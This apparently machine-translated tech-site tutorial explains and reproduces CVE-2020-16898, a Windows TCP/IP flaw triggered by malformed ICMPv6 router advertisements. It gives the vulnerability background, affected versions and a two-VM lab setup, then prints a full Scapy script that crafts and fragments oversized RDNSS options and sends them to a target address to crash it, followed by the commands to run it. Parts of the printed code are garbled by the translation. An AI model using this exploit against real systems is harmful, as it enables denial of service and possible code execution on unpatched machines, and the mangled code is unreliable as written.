Shulou(Shulou.com)05/31 Report--

This article shows you how to reproduce the CVE-2020-16898 vulnerability. The content is concise and easy to understand. It will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Brief introduction of vulnerabilities

A remote execution code intrusion exists when the Windows TCP / IP size improperly processes the ICMPv6 router advertisement packet. An attacker who successfully exploits this intrusion can gain the ability to execute code on the target server or client, which can make the victim blue screen.

In order to exploit this vulnerability, an attacker may have to send a specially designed ICMPv6 router advertising packet to a remote Windows computer.

Loophole analysis

A vulnerability exists when the Windows TCP / IP stack improperly handles ICMPv6 router advertising packets that use option type 25 (recursive DNS server option) with an even number of length field values.

When an even length value is provided, the Windows TCP / IP stack mistakenly reduces the number of rows in the network buffer by 8 bytes. This is because the stack counts internally in 16-byte increments, so the use of non-RFC compatible length values cannot be resolved. This mismatch causes the stack to interpret the last 8 bytes of the current option as the beginning of the second option, resulting in a buffer overflow and potential RCE.

Affect the version

Microsoft Windows 10 1709 Microsoft Windows 10 1803 Microsoft Windows 10 1809 Microsoft Windows 10 1903 Microsoft Windows 10 1909 Microsoft Windows 10 2004 Microsoft Windows Server 2019

Environmental deployment

Attack plane IP:192.168.192.1 (win10 1909)

Target aircraft IP:192.168.192.128 (win10 1809)

Loophole recurrence

Make sure the target machine turns on NAT mode and ipv6.

Click the virtual network editor in full screen mode and then click to change settings

Then open ipv6 and click OK.

Make sure that both machines can ping each other.

Target aircraft ping attack aircraft

Attack aircraft ping target aircraft

Check the ipv6 address of the target machine

Check the ipv6 address of the attack plane.

Then use an online pyload

The content is

From scapy.all import * from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment Fragment6 v6_dst = "fd15:4ba5:5a2b:1008:5d26:75a3:1641:ee3" # change to the ipv6 address of the target machine or temporary ipv6 address v6_src = "fe80::9548:d004:9491:9c34" # the local ipv6 address of the attacker p_test_half = 'A'.encode () * 8 + b "\ x18\ x30" + b "\ xFF\ x18" p_test = p_test_half +' Aids. Encode () * 4 c = ICMPv6NDOptEFA () e = ICMPv6NDOptRDNSS () e.len = 21e.dns = ["AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA" "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA"] aaa = ICMPv6NDOptRDNSS () aaa.len = 8pkt = ICMPv6ND_RA () / aaa /\ Raw (load='A'.encode () * 16x2 + p_test_half + b "\ x18\ xa0" * 6) / c / e / c / e / c / e / c / e / e p_test_frag = IPv6 (dst=v6_dst, src=v6_src Hlim=255) /\ IPv6ExtHdrFragment () / pkt l=fragment6 (p_test_frag, 200) for p in l: send (p)

The ip of the target machine above should be an ipv6 address or a temporary ipv6 address

The ipv6 of the attack plane needs to link the ipv6 address locally.

When an address is written to payload, an attack can be carried out.

The attack takes advantage of a scapy component that relies on the python environment

Install the python environment on the attack plane (download and configure the environment from the official website)

Scapy is a Python program that enables users to send, sniff, parse and forge network packets. This feature allows you to build tools that can detect, scan, or attack the network.

The command is pip install scapy

If it fails, the python version may be too high. You can choose the python3.7 version.

You can see that I installed this component.

Start scapy and the following interface appears

Cd enters the desktop (this file exists on the desktop)

Then use this command:

Python CVE-2020-16898.py

You can see the blue screen of the injured machine.

The experiment is completed

Vulnerability repair

Try to turn on the firewall

Turn off the ipv6 service

Strictly filter external traffic

The above content is how to reproduce the CVE-2020-16898 vulnerability. Have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.